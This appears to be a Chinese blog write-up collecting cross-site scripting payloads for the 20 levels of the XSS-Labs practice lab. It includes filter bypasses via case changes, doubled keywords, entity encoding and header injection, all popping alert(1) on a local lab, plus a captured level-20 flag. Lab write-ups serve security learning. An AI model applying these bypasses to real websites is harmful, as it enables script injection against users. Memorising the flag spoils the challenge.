XSS-Lab

1.关于20关的payload合集。

<script>alert(1)</script>
"><script>alert(1)</script>
'onclick='alert(1)
" onclick="alert(1)
"><a href="javascript:alert(1)">
"><a HrEf="javascript:alert(1)">
"><scscriptript>alert(1)</sscriptcript>
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
?t_sort=" type="text" onclick="alert('xss')
" type="text" onmousemove="alert(1)    #将payload写到referer里
" type="text" onmousemove="alert(1) 	 #将payload写User-Agent头
" type="text" onmousemove="alert(1)    #将payload写cookie头
payload是一张图片马
http://127.0.0.1/xss-labs-master/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'
http://127.0.0.1/xss-labs-master/level16.php?keyword=<img%0dsrc=1%0donerror=alert(1)>
http://127.0.0.1/xss-labs-master/level17.php?arg01=a&arg02=aaa onmousemove='alert(1)'
http://127.0.0.1/xss-labs-master/level18.php?arg01=a&arg02=aaa onmousemove='alert(1)'
arg01=version&arg02=<a href="javascript:alert(1)">123</a>
arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)

10.修改参数

修改

点击

20.如果不想走流程,可直接跳过前往20关获得flag

http://a2f864e8-582b-4d62-a066-a1fd17700dd2.node5.buuoj.cn:81/level20.php
查看源码获得
flag{ad270776-5056-479e-8119-fcf63393d388}

右键查看源码,获得flag{ad270776-5056-479e-8119-fcf63393d388}

相关推荐
索然无味io4 分钟前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
H4_9Y7 分钟前
顶顶通呼叫中心中间件mod_cti模块安全增强,预防盗打风险(mod_cti基于FreeSWITCH)
安全·中间件
m0_7482565616 分钟前
Windows 11 Web 项目常见问题解决方案
前端·windows
LOVE️YOU17 分钟前
HTML&CSS&JavaScript&DOM 之间的关系?
前端·javascript·css·html
胡西风_foxww18 分钟前
【es6复习笔记】集合Set(13)
前端·笔记·es6·set·集合
m0_7482449627 分钟前
VUE前端实现天爱滑块验证码--详细教程
前端·javascript·vue.js
Hacker_Oldv1 小时前
网络安全中常用浏览器插件、拓展
安全·web安全
网络安全(king)1 小时前
网络安全设备
网络·web安全·php
叫我菜菜就好1 小时前
【Flutter_Web】Flutter编译Web第三篇(网络请求篇):dio如何改造方法,变成web之后数据如何处理
前端·网络·flutter
NoneCoder1 小时前
CSS系列(26)-- 动画性能优化详解
前端·css·性能优化